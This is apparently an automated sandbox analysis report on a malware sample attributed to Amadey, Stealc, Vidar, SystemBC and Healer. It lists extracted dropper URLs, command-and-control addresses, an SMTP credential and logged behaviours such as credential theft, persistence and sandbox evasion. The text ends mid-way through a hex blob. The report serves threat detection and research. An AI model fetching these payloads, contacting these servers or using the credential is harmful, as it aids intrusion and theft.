amadey | bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e

Analysis

max time kernel
87s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06/03/2025, 05:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe
Size

938KB
MD5

78796a8755ee5cc1c74279bbba9dadd9
SHA1

21dd52e48d9e8b0cd2ee2702e2c1353f61ae32f6
SHA256

bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e
SHA512

53ff56fbd963d5288829e87158373ab57862d7cc8b721c0e2cd5672c3042824e85d456f648180b731059c400d1e6e02b3cd5c8c0a9952c33e9f9034e95ba6ec0
SSDEEP

24576:cqDEvCTbMWu7rQYlBQcBiT6rprG8a0qu:cTvC/MTQYxsWR7a0q

Score

10^/10

amadey healer stealc systembc vidar 092155 ir7am traff1 credential_access defense_evasion discovery dropper execution persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Credentials

Protocol: smtp
Host:
mail.homelifebc.com
Port:
587
Username:
[email protected]
Password:
password

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

traff1

Attributes

url_path
/gtthfbsb2h.php

Extracted

Family

systembc

towerbingobongoboom.com

62.60.226.86

Attributes

dns
5.132.191.104

Extracted

Family

vidar

Botnet

ir7am

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral1/memory/1552-878-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/1552-876-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/1552-874-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 2 IoCs

resource	yara_rule
behavioral1/memory/4068-3073-0x0000000001190000-0x00000000015EC000-memory.dmp	healer
behavioral1/memory/4068-3074-0x0000000001190000-0x00000000015EC000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Systembc family
systembc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp2OJOTJENJFPLAHGBTSIMWOJXV90JJYV9.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	vertualiziren.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	qjdkxjv.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2604	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2292	powershell.exe
2156	powershell.exe
1460	powershell.exe
2308	powershell.exe
2844	powershell.exe
3904	powershell.exe
3876	powershell.exe
2216	powershell.exe
3244	powershell.exe
2604	powershell.exe
2156	powershell.exe
2292	powershell.exe

Downloads MZ/PE file 40 IoCs

flow	pid	Process
4	2604	powershell.exe
49	1412	rapes.exe
82	2216	powershell.exe
14	3040	ILqcVeT.exe
14	3040	ILqcVeT.exe
14	3040	ILqcVeT.exe
14	3040	ILqcVeT.exe
14	3040	ILqcVeT.exe
14	3040	ILqcVeT.exe
14	3040	ILqcVeT.exe
23	1412	rapes.exe
23	1412	rapes.exe
69	2704	ILqcVeT.exe
69	2704	ILqcVeT.exe
69	2704	ILqcVeT.exe
69	2704	ILqcVeT.exe
69	2704	ILqcVeT.exe
69	2704	ILqcVeT.exe
69	2704	ILqcVeT.exe
77	1412	rapes.exe
77	1412	rapes.exe
77	1412	rapes.exe
77	1412	rapes.exe
77	1412	rapes.exe
77	1412	rapes.exe
77	1412	rapes.exe
77	1412	rapes.exe
77	1412	rapes.exe
11	2084	Gxtuum.exe
7	1412	rapes.exe
7	1412	rapes.exe
7	1412	rapes.exe
7	1412	rapes.exe
29	1996	rXOl0pp.exe
29	1996	rXOl0pp.exe
29	1996	rXOl0pp.exe
29	1996	rXOl0pp.exe
29	1996	rXOl0pp.exe
29	1996	rXOl0pp.exe
29	1996	rXOl0pp.exe

Uses browser remote debugging 2 TTPs 53 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2432	chrome.exe
1112	chrome.exe
1516	chrome.exe
3920	chrome.exe
1432	chrome.exe
3908	chrome.exe
1240	chrome.exe
2544	chrome.exe
1884	chrome.exe
2216	chrome.exe
1328	chrome.exe
3708	chrome.exe
2748	chrome.exe
1616	chrome.exe
2404	chrome.exe
1528	chrome.exe
2536	chrome.exe
2536	chrome.exe
1196	chrome.exe
3632	chrome.exe
3760	chrome.exe
2860	chrome.exe
3736	chrome.exe
2492	chrome.exe
552	chrome.exe
1632	chrome.exe
2968	chrome.exe
3612	chrome.exe
3532	chrome.exe
3044	chrome.exe
1932	chrome.exe
2628	chrome.exe
3744	chrome.exe
3148	chrome.exe
1896	chrome.exe
1116	chrome.exe
3976	chrome.exe
1684	chrome.exe
1572	chrome.exe
3276	chrome.exe
3292	chrome.exe
1652	chrome.exe
3376	chrome.exe
2684	chrome.exe
2668	chrome.exe
3560	chrome.exe
2652	chrome.exe
2328	chrome.exe
1552	chrome.exe
3368	chrome.exe
3948	chrome.exe
1436	chrome.exe
2528	chrome.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x000500000001d360-826.dat	net_reactor
behavioral1/memory/2340-834-0x0000000000850000-0x00000000008B0000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vertualiziren.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vertualiziren.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp2OJOTJENJFPLAHGBTSIMWOJXV90JJYV9.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	qjdkxjv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp2OJOTJENJFPLAHGBTSIMWOJXV90JJYV9.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	qjdkxjv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rXOl0pp.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	zY9sqWs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	zY9sqWs.exe

Executes dropped EXE 22 IoCs

pid	Process
2480	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
1412	rapes.exe
2684	PcAIvJ0.exe
1620	nhDLtPT.exe
2084	Gxtuum.exe
3040	ILqcVeT.exe
2788	vertualiziren.exe
1996	rXOl0pp.exe
2092	zY9sqWs.exe
2732	PcAIvJ0.exe
1848	v6Oqdnc.exe
4072	MCxU5Fj.exe
2644	MCxU5Fj.exe
2340	mAtJWNv.exe
1552	mAtJWNv.exe
1308	qjdkxjv.exe
3648	FvbuInU.exe
1896	nhDLtPT.exe
2704	ILqcVeT.exe
2852	rXOl0pp.exe
3428	03aa9b8fea.exe
1864	Temp2OJOTJENJFPLAHGBTSIMWOJXV90JJYV9.EXE

Identifies Wine through registry keys 2 TTPs 11 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	ILqcVeT.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	vertualiziren.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	rXOl0pp.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	v6Oqdnc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	FvbuInU.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	qjdkxjv.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	ILqcVeT.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	rXOl0pp.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine	Temp2OJOTJENJFPLAHGBTSIMWOJXV90JJYV9.EXE

Loads dropped DLL 54 IoCs

pid	Process
2604	powershell.exe
2604	powershell.exe
2480	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
2480	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
1412	rapes.exe
1412	rapes.exe
1412	rapes.exe
1620	nhDLtPT.exe
1412	rapes.exe
1412	rapes.exe
2084	Gxtuum.exe
2084	Gxtuum.exe
1412	rapes.exe
1412	rapes.exe
1412	rapes.exe
1412	rapes.exe
1412	rapes.exe
3040	ILqcVeT.exe
3040	ILqcVeT.exe
1412	rapes.exe
1412	rapes.exe
3096	WerFault.exe
3096	WerFault.exe
3096	WerFault.exe
1412	rapes.exe
4072	MCxU5Fj.exe
3008	WerFault.exe
3008	WerFault.exe
3008	WerFault.exe
3008	WerFault.exe
3008	WerFault.exe
1652	WerFault.exe
1652	WerFault.exe
1652	WerFault.exe
1652	WerFault.exe
1652	WerFault.exe
1412	rapes.exe
1412	rapes.exe
2340	mAtJWNv.exe
3112	WerFault.exe
3112	WerFault.exe
3112	WerFault.exe
1412	rapes.exe
1412	rapes.exe
1412	rapes.exe
1996	rXOl0pp.exe
1996	rXOl0pp.exe
1412	rapes.exe
1412	rapes.exe
1412	rapes.exe
1412	rapes.exe
1412	rapes.exe
2216	powershell.exe
2216	powershell.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\03aa9b8fea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110390101\\03aa9b8fea.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000800000001cc7c-1320.dat	autoit_exe
behavioral1/files/0x001000000001d6d6-2753.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

pid	Process
2480	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
1412	rapes.exe
3040	ILqcVeT.exe
2788	vertualiziren.exe
1996	rXOl0pp.exe
1848	v6Oqdnc.exe
1308	qjdkxjv.exe
3648	FvbuInU.exe
2704	ILqcVeT.exe
2852	rXOl0pp.exe
1864	Temp2OJOTJENJFPLAHGBTSIMWOJXV90JJYV9.EXE

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4072 set thread context of 2644	4072	MCxU5Fj.exe	103
PID 2340 set thread context of 1552	2340	mAtJWNv.exe	109

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
File created	C:\Windows\Tasks\Gxtuum.job	nhDLtPT.exe
File created	C:\Windows\Tasks\Test Task17.job	vertualiziren.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
3096	1848	WerFault.exe	89
3008	4072	WerFault.exe	101
1652	2644	WerFault.exe	103
3112	2340	WerFault.exe	108
3184	1448	WerFault.exe	190
4004	1680	WerFault.exe	191
3252	3232	WerFault.exe	258
3788	2852	WerFault.exe	141

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vertualiziren.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zY9sqWs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qjdkxjv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	03aa9b8fea.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nhDLtPT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ILqcVeT.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
1856	timeout.exe
4168	timeout.exe

Enumerates system info in registry 2 TTPs 20 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
2468	taskkill.exe
3900	taskkill.exe
1580	taskkill.exe
3884	taskkill.exe
3284	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 3 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	FvbuInU.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	FvbuInU.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec